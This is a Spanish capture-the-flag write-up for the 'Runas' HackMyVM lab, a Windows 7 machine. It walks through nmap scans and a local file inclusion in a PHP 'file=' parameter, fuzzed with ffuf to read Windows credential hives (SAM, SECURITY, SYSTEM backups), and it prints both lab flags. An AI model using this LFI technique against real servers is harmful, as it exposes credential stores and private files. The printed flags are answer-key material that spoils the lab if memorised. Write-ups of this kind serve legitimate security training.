Runas HackMyVM (Easy - Windows)
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>
nmap -sCV -p<PORTS> <IP>
Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-30 03:11 EDT
Nmap scan report for 192.168.1.162
Host is up (0.00033s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64) PHP/7.2.0)
|_http-title: Index of /
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64) PHP/7.2.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp closed ms-wbt-server
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:5A:0A:A1 (Oracle VirtualBox virtual NIC)
Service Info: Host: RUNAS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: runas-PC
| NetBIOS computer name: RUNAS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-03-30T10:12:26+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-03-30T07:12:26
|_ start_date: 2025-03-30T07:09:26
|_clock-skew: mean: -59m57s, deviation: 1h43m54s, median: 1s
|_nbstat: NetBIOS name: RUNAS-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5a:0a:a1 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.09 seconds
Si entramos en la pagina del puerto 80
veremos lo siguiente:
Vemos que nos esta indicando algo con file=
lo que podemos deducir que puede ser un parametro para leer archivos en el index.php
, por lo que podriamos realizar un LFI
.
URL = http://<IP>/index.php?file=styles.css
Veremos que nos muestra el archivo:
Pero vamos a probar a realizar un poco de fuzzing
para ver que rutas encontramos.
FFUF
ffuf -u 'http://<IP>/index.php?file=FUZZ' -w <WORDLIST> -fs 429
Info:
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.1.162/index.php?file=FUZZ
:: Wordlist : FUZZ: /home/kali/Desktop/LFIWindowsList/LFI-gracefulsecurity-windows.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 429
________________________________________________
C:/Users/Administrator/NTUser.dat [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 4ms]
C:/Windows/win.ini [Status: 200, Size: 1042, Words: 103, Lines: 46, Duration: 1ms]
C:/Windows/system32/config/regback/default [Status: 200, Size: 631, Words: 84, Lines: 20, Duration: 0ms]
C:/Windows/system32/config/regback/sam [Status: 200, Size: 627, Words: 84, Lines: 20, Duration: 1ms]
C:/Windows/system32/config/regback/security [Status: 200, Size: 632, Words: 84, Lines: 20, Duration: 0ms]
C:/Windows/system32/config/regback/system [Status: 200, Size: 630, Words: 84, Lines: 20, Duration: 1ms]
C:/Windows/system32/config/regback/software [Status: 200, Size: 632, Words: 84, Lines: 20, Duration: 1ms]
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml [Status: 200, Size: 58608, Words: 8247, Lines: 599, Duration: 1ms]
c:/php/php.ini [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 1ms]
c:/PHP/php.ini [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 3ms]
C:/WINDOWS/Repair/SAM [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 29ms]
C:/php/php.ini [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 33ms]
C:/Windows/repair/system [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 63ms]
C:/WINDOWS/System32/drivers/etc/hosts [Status: 200, Size: 1375, Words: 260, Lines: 39, Duration: 65ms]
C:/Windows/System32/inetsrv/config/applicationHost.config [Status: 200, Size: 79253, Words: 12108, Lines: 821, Duration: 63ms]
c:/WINDOWS/system32/drivers/etc/networks [Status: 200, Size: 946, Words: 171, Lines: 34, Duration: 1ms]
c:/WINDOWS/system32/drivers/etc/lmhosts.sam [Status: 200, Size: 4760, Words: 774, Lines: 97, Duration: 1ms]
c:/WINDOWS/system32/drivers/etc/protocol [Status: 200, Size: 1973, Words: 539, Lines: 45, Duration: 2ms]
c:/WINDOWS/WindowsUpdate.log [Status: 200, Size: 108084, Words: 8722, Lines: 1171, Duration: 1ms]
c:/WINDOWS/system32/drivers/etc/hosts [Status: 200, Size: 1375, Words: 260, Lines: 39, Duration: 12ms]
c:/WINDOWS/setuperr.log [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 12ms]
c:/WINDOWS/system32/drivers/etc/services [Status: 200, Size: 19622, Words: 8783, Lines: 303, Duration: 14ms]
c:/WINDOWS/setupact.log [Status: 200, Size: 25712, Words: 2474, Lines: 314, Duration: 17ms]
:: Progress: [236/236] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
Vemos las rutas que si sirven en este caso, tambien estamos viendo que esta accediendo a rutas de Administradores
por lo que podemos pensar que puede tener algun tipo de privilegio el usuario que esta ejecutando esta lectura de archivos.
Si estas rutas las probamos algunas nos van a ir, pero otras no, por lo que vamos a seguir descartanto un poco mas:
ffuf -u 'http://<IP>/index.php?file=FUZZ' -w <WORDLIST> -fs 429 -fw 68
Info:
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.1.162/index.php?file=FUZZ
:: Wordlist : FUZZ: /home/kali/Desktop/LFIWindowsList/LFI-gracefulsecurity-windows.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 429
:: Filter : Response words: 68
________________________________________________
C:/Windows/system32/config/regback/default [Status: 200, Size: 631, Words: 84, Lines: 20, Duration: 1ms]
C:/Windows/system32/config/regback/sam [Status: 200, Size: 627, Words: 84, Lines: 20, Duration: 1ms]
C:/Windows/system32/config/regback/security [Status: 200, Size: 632, Words: 84, Lines: 20, Duration: 0ms]
C:/Windows/system32/config/regback/system [Status: 200, Size: 630, Words: 84, Lines: 20, Duration: 0ms]
C:/Windows/system32/config/regback/software [Status: 200, Size: 632, Words: 84, Lines: 20, Duration: 1ms]
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml [Status: 200, Size: 58608, Words: 8247, Lines: 599, Duration: 1ms]
c:/PHP/php.ini [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 1ms]
C:/Windows/win.ini [Status: 200, Size: 1042, Words: 103, Lines: 46, Duration: 42ms]
C:/php/php.ini [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 56ms]
C:/WINDOWS/System32/drivers/etc/hosts [Status: 200, Size: 1375, Words: 260, Lines: 39, Duration: 43ms]
C:/Windows/System32/inetsrv/config/applicationHost.config [Status: 200, Size: 79253, Words: 12108, Lines: 821, Duration: 35ms]
c:/php/php.ini [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 64ms]
c:/WINDOWS/system32/drivers/etc/hosts [Status: 200, Size: 1375, Words: 260, Lines: 39, Duration: 1ms]
c:/WINDOWS/system32/drivers/etc/lmhosts.sam [Status: 200, Size: 4760, Words: 774, Lines: 97, Duration: 1ms]
c:/WINDOWS/system32/drivers/etc/networks [Status: 200, Size: 946, Words: 171, Lines: 34, Duration: 0ms]
c:/WINDOWS/system32/drivers/etc/protocol [Status: 200, Size: 1973, Words: 539, Lines: 45, Duration: 1ms]
c:/WINDOWS/system32/drivers/etc/services [Status: 200, Size: 19622, Words: 8783, Lines: 303, Duration: 1ms]
c:/WINDOWS/WindowsUpdate.log [Status: 200, Size: 108084, Words: 8722, Lines: 1171, Duration: 2ms]
c:/WINDOWS/setupact.log [Status: 200, Size: 25712, Words: 2474, Lines: 314, Duration: 18ms]
:: Progress: [236/236] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
Habiendo echo un segundo filtro, veremos que estas si las probamos todas nos van a mostrar el contenido del archivo.
Pero no nos servira de mucho, lo que si podemos probar es a intentar ver las flags
del usuario que suponemos que se llamara runas
por como se llama la maquina y el del administrador
.
user.txt
URL = http://<IP>/index.php?file=C:\Users\runas\Desktop\user.txt
Info:
HMV{User_Flag_Was_A_Bit_Bitter}
root.txt
URL = http://<IP>/index.php?file=C:/Users/Administrator/Desktop/root.txt
Info:
HMV{Username_Is_My_Hint}
Y con esto ya habremos terminado la maquina.
Last updated